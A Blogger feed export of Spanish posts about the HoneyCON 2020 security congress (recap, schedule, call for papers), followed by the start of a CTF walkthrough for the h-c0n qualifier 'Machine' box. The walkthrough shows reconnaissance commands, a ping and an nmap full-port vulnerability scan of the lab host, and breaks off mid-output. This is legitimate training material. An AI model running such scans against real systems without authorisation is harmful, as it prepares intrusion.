Castellano y algo mas de 5 horas de contenidos en inglés.<o:p></o:p></p><p class="MsoNormal" style="text-align: justify;">
</p><p class="MsoNormal" style="text-align: justify;">Los eventos presenciales fueron
seguidos por un total de 635 personas en las diferentes propuestas que el
congreso ha realizado. Datos que obviamente han sido impactados por las medidas
de precaución contra el COVID, por las que se ha ofrecido un 40% de los puestos
que tradicionalmente se ofertan en años anteriores a la pandemia, con el simple
objetivo de mantener la distancia de seguridad.<o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='434' height='241' src='https://www.blogger.com/video.g?token=AD6v5dwBlwJTjK4ntIshHP88XxahDJTtbFxNCgcoo5a_CH2KVUHGK5NlGd4zfogzVfjss5paEr-jNcq0Esl-5S_EHA' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div><br /><p class="MsoNormal" style="text-align: justify;"><br /></p></div>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.comGuadalajara, España40.632489 -3.1601712.322255163821154 -38.31642 68.942722836178845 31.99608tag:blogger.com,1999:blog-4789894782637921835.post-90266858685637277452020-11-08T21:12:00.003+01:002020-11-08T21:12:48.502+01:00HoneyCON 2020<div class="separator"><p style="margin-left: 1em; margin-right: 1em;"> <img height="308" src="https://lh3.googleusercontent.com/p-dpKiAONEc23AQTNINyyfY2eIDwqCmrvUCCqcnerLtmp69VUA39u4MGXLr6_JEd8eJb-asC6lft27zezu_vQ09hS-irwY790D2er_CFcz5WAacSI1akzDZGNN4MukRD_3gyYuq0" style="font-family: Arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre-wrap;" width="624" /></p></div><span id="docs-internal-guid-cac64cff-7fff-27b4-b32b-306a17a61ed6"><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Durante el fin de semana del 7 al 8 de noviembre se celebró la VI edición del Congreso de seguridad informática ciudad de Guadalajara, organizado por la Junta de Comunidades de Castilla La Mancha, la asociación HoneySEC con la colaboración del centro asociado de la UNED de Guadalajara y el Ayuntamiento de Guadalajara.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span></span></span></p><a name='more'></a></span><p></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Debido a la situación sanitaria que atravesamos por el Covid-19 el congreso se celebró de manera online, abriéndose así a participación y audiencia de todo el mundo. Para esta edición contamos con ponentes de India, Inglaterra, Italia, España, Estados Unidos, Colombia, Honduras, Argentina y Brasil, que se repartieron entre las tres salas dispuestas, una para ponencias en castellano, otra para ponencias en inglés y una última para talleres demostrativos en castellano.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Para dar un aporte novedoso a la batería de nuevos congresos que se han celebrado en los últimos meses, generalmente todos online, la organización optó por la modalidad de maratón de charlas 24 horas buscando como objetivo que durante 24 horas completas se emitiera alguna charla o taller de ciberseguridad. Objetivo cumplido emitiendo 40 horas de contenidos en 37 charlas o talleres.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Canal en Castellano</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">La sala en castellano presentó una buena colección de charlas de ponentes de gran nivel en el panorama nacional y de latino america, destacando la sexta participación de Pablo Gonzalez que como es costumbre hizo doblete y abrió el evento con su charla “BLE alrededor tuyo: ¿Quieres auditarlo?” sobre Bluetooth Low Energy y fue seguido por ponentes de primer nivel como Josep Albors, Jordi Ubah, Raúl Beamund, etc.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 327px; overflow: hidden; width: 624px;"><img height="327" src="https://lh3.googleusercontent.com/X5l9ISpGA6gtQjDUwYU9pUdh_YWLY8CP2f4x1wkJS0B1FbrWRlCMYf_1cyS4ya_IwGGvIaP6X4Zm-1PrAzs4EH1MmL3Ggx11t1e-UrslgdvJIJjw23wqvPL0ncdF2kBun9H4h5bP" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Participación de Jordi Ubah en el evento presentado por Yolanda Corral</span></p><div><span><br /></span></div><div><span><br /></span></div><div><span>Videos de la jornada en la sala castellano:</span></div><div><span><br /></span></div><div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/uD605b9ZjAE" width="320" youtube-src-id="uD605b9ZjAE"></iframe></div><br /><span><br /></span></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/eGPc9rVqjgE" width="320" youtube-src-id="eGPc9rVqjgE"></iframe></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/HxFDuyYcZ7A" width="320" youtube-src-id="HxFDuyYcZ7A"></iframe></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div><br /><span><br /></span></div><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Canal en Inglés</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">En la sala en inglés, se celebraron un total de 9 charlas de alto interés y con ponentes de carácter internacional, en la que se habló de Fake news, Geopolítica, Ciberinteligencia, forensia y otros temas de alto interés en materia de ciberseguridad. Cabe destacar la participación de Allie Mellen y Amber Vandenburg con temáticas que levantaron el interés del auditorio.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 351px; overflow: hidden; width: 624px;"><img height="351" src="https://lh6.googleusercontent.com/tHlQFEH6CGopxTnZe0_UyEY_YE0-ZheV01dNzwGjeMm8EhNOu-1amFDbSKv8UN7CR3-ggtNLbUYC2Dw5pa3Dzs834fD_b_F0BzJ7kzHuBYlh3OugB7MzWbDk7_izy-yJ3f1bSFsZ" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Captura de un momento de la charla de Allie Mellen</span></p><br /><br /><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Talleres prácticos</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 351px; overflow: hidden; width: 624px;"><img height="351" src="https://lh3.googleusercontent.com/Uh-0i1T1BUS911T5MX4eZSGayRIh-eXkQI1n_llDCFl4oZSfXfA3k0sdgMHJy7UcwjN9MIEnxp9CdxsfTaELtKm8FOtfZyoEmyHM1dCIz5l5DT2ap67ta5-fM5PPsSqZrifQXUzJ" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Imagen del taller de Rafael Otal y José Luis Navarro</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">En la sala de Talleres la actividad fue iniciada por Antonio Juanilla (Specter) con un taller sobre Ciberinteligencia, al que siguió un repaso del estándar PCI DSS por parte de Antonio Rodriguez. En la jornada de domingo los talleres vinieron de la mano de Jose Luis Navarro y Rafa Otal con su trabajo sobre securización de clusters, Securización de entornos dockerizados por parte de Specter y se cerró la sala con un taller de Pablo Gonzalez y Alvaro Muñoz sobre Post Explotación y su desarrollo ibombshell.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 172px; overflow: hidden; width: 624px;"><img height="172" src="https://lh4.googleusercontent.com/N1RrRfsMmAE8fzvtNFfbgMSzxx83gXwhPHpdFnh5WJOR3A9LGbAlnanKWz39kZ-9Wau4SXL_Thr1FD5-26Ad39rioP_DlJ3YOCEI3nt7wLeDfTPiJIjSm3UFAXjb0PiM4Rp7QlQT" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Listado de talleres de la VI edición de HoneyCON</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"></p><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/1_61QgADJj4" width="320" youtube-src-id="1_61QgADJj4"></iframe></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/dj44bEbTTpo" width="320" youtube-src-id="dj44bEbTTpo"></iframe></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/ArzFLNSEaLE" width="320" youtube-src-id="ArzFLNSEaLE"></iframe></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><div><span style="font-family: Arial; font-size: 9pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0Guadalajara, España40.632489 -3.1601712.322255163821154 -38.31642 68.942722836178845 31.99608tag:blogger.com,1999:blog-4789894782637921835.post-3010743749677442772020-11-05T11:30:00.003+01:002020-11-05T11:30:14.561+01:00Este fin de semana se celebra el VI HoneyCON (Isolated Edition).<p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqzPsNu8qJn-MYhlb6fpBJPlJfwOwb-K_ffbCfQnCFDP4b2X1t4RjAj1LVisuv1iUYrXp3JfVfJcFodiK6GQ1RJJkiREztV92gKgfQSGtjJmb23bbLAfP6kWkqsE5xiA_0xf5EOIOCkYWi/s1340/webHoneycon20.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="632" data-original-width="1340" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqzPsNu8qJn-MYhlb6fpBJPlJfwOwb-K_ffbCfQnCFDP4b2X1t4RjAj1LVisuv1iUYrXp3JfVfJcFodiK6GQ1RJJkiREztV92gKgfQSGtjJmb23bbLAfP6kWkqsE5xiA_0xf5EOIOCkYWi/w640-h302/webHoneycon20.PNG" width="640" /></a></div><span style="font-family: Arial; font-size: 14pt; text-align: justify; white-space: pre-wrap;"><br /></span><p></p><p style="text-align: justify;"><span style="font-family: Arial; font-size: 14pt; text-align: justify; white-space: pre-wrap;">Este fin de semana se celebra el sexto Congreso de Seguridad Informática de Guadalajara. El evento está organizado por la Junta de Comunidades de Castilla La Mancha y la Asociación de Seguridad Informática de Guadalajara y se desarrollará online debido a las restricciones sanitarias. En esta ocasión se emitirá en abierto a través de la plataforma Twitch de manera totalmente gratuita.</span></p><span id="docs-internal-guid-1d7b70f2-7fff-de3c-da03-d523f6d94efe"><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">En esta edición el congreso se ha abierto a todo el mundo emitiendo charlas y ponencias en castellano e inglés. El evento cuenta con 27 ponentes de todo el mundo, desde India a Estados Unidos. </span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Se han preparado ponencias de todas las temáticas y niveles para acercar la ciberseguridad a todas las personas interesadas en esta apasionante materia. Los horarios del evento se pueden consultar en la página web oficial del evento, www.honeycon.eu.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">El congreso se iniciará el sábado 7 de noviembre a las 16 horas y terminará el domingo 8 a las 16 horas, completando así 24 horas de emisión en directo por primera vez en un evento de ciberseguridad a nivel mundial.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">La retransmisión puede seguirse a través del canal de Youtube “Palabra de Hacker” y de los siguientes canales de Twitch:</span></p><br /><ul style="margin-bottom: 0; margin-top: 0;"><li dir="ltr" style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Retransmisión múltiple: </span><a href="https://www.multitwitch.tv/honey_sec/honey_ing/honey_taller" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.multitwitch.tv/honey_sec/honey_ing/honey_taller</span></a></p></li><li dir="ltr" style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Canal Castellano: </span><a href="https://www.twitch.tv/honey_sec" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.twitch.tv/honey_sec</span></a><span style="font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li><li dir="ltr" style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Canal Ingles: </span><a href="https://www.twitch.tv/honey_ing" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.twitch.tv/honey_ing</span></a><span style="font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li><li dir="ltr" style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Canal Talleres: </span><a href="https://www.twitch.tv/honey_taller" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.twitch.tv/honey_taller</span></a><span style="font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li><li dir="ltr" style="font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline; white-space: pre-wrap;">Canal Youtube: </span><a href="https://www.youtube.com/channel/UCcyWP9LAiT1MnG6T6Lf5a2A" style="text-align: left; text-decoration-line: none;"><span style="color: #1155cc; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://www.youtube.com/channel/UCcyWP9LAiT1MnG6T6Lf5a2A</span></a><span style="font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li></ul></span>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0Guadalajara, España40.632489 -3.160179.2140490172261309 -38.31642 72.050928982773868 31.99608tag:blogger.com,1999:blog-4789894782637921835.post-35856422858985258202020-09-08T12:55:00.004+02:002020-09-08T12:55:41.525+02:00Cerrado el plazo de presentación de trabajos y ponencias para HoneyCon 2020<div class="separator"><p style="margin-left: 1em; margin-right: 1em;"> <img alt="Cerrado el plazo de presentación de trabajos y ponencias para HoneyCon 2020" height="481" src="https://www.guadanews.es/fotos/149/CFP_GUADANEWS_thumb_720.jpg" width="720" /></p><p style="margin-left: 1em; margin-right: 1em;"></p><div style="text-align: justify;"><span style="background-color: white; color: #201c1d; font-family: Arial; font-size: 17px;">El pasado 31 de agosto se cerró el plazo de presentación de ponencias para la sexta edición del congreso de seguridad informática de la ciudad de Guadalajara. En esta ocasión se han recibido 87 propuestas de las que tras el proceso de validación se han aceptado 51 ponencias y 6 talleres.</span></div><div style="text-align: justify;"><span style="color: #201c1d; font-family: Arial; font-size: 17px;"><br /></span></div><span style="background-color: white; color: #201c1d; font-family: Arial; font-size: 17px;"><div style="text-align: justify;">Los trabajos recibidos provienen de prácticamente todos los rincones del planeta, siendo los más representativos países como Estados Unidos, Francia, Italia, La India, Rusia, México, Colombia, Argentina, Croacia y España.</div></span><div style="text-align: justify;"><span style="color: #201c1d; font-family: Arial; font-size: 17px;"><br /></span></div><span style="background-color: white; color: #201c1d; font-family: Arial; font-size: 17px;"><div style="text-align: justify;">Desde el lunes 7 de septiembre se debatirá internamente cuáles de las charlas y talleres formarán parte del panel final de ponentes de la edición de 2020 que se celebrará durante el fin de semana del 7 y 8 de noviembre, en un formato novedoso de carácter online. La organización se reserva la opción de realizar eventos presenciales para público reducido y con control de aforo si las condiciones de la pandemia lo permiten.</div></span><p></p></div>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0tag:blogger.com,1999:blog-4789894782637921835.post-23511591403395885032020-06-07T22:16:00.000+02:002020-06-07T22:16:28.071+02:00h-c0n qualifier CTF 2020 boot2root Walkthrough: Machine (User flag)<span id="docs-internal-guid-0654bdc4-7fff-b304-2798-1a53ee49f023"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Machine es una máquina ubicada en </span><a href="https://ctf.h-c0n.com/challenges#Machine%20(User%20flag)" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">h-c0n qualifier CTF</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> que debemos vulnerar para conseguir las flags de usuario (user.txt) y root (root.txt) creada por </span><a href="https://www.ihacklabs.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">iHackLabs </span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">basada en Windows OS, os mostraremos los pasos que hemos dado.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">Autor: 1v4n a.k.a. @1r0Dm48O</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Twitter: </span><a href="https://twitter.com/1r0Dm48O" style="font-family: "Times New Roman"; font-size: medium; text-decoration-line: none; white-space: normal;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://twitter.com/1r0Dm48O</span></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"> </span></span></p><br /><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 255px; overflow: hidden; width: 321px;"><img height="255" src="https://lh4.googleusercontent.com/ZmLju8tZIY4XO5UGPh7gaq-fI2PRjZsLY1nzJ3ZCbf6whgHYJolG5BO6VJDYSCvzHEorRdtwi16foxLz02bIRUkVgXnQgMUnKG3nJLVE8Rz3UdWK5gMJTbgHPXyGljHPuzsYV2vd" style="margin-left: 0px; margin-top: 0px;" width="321" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><br /></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">{0x1} Reconocimiento</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Y comprobamos que hay conexión con la máquina a vulnerar lanzado un </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ping -c 3</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> preq02.ihacklabs.com</span></p><br /><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">{0x2} Escaneo</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Realizamos un escaneo de puertos para comprobar los servicios que están abiertos y corriendo en la máquina a vulnerar con </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">nmap -sS -sV preq02.ihacklabs.com -p- --script vuln</span></p><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody><tr style="height: 0pt;"><td style="background-color: #333333; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">root</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">@</span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1v4n</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:~/</span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CTF</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/</span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; 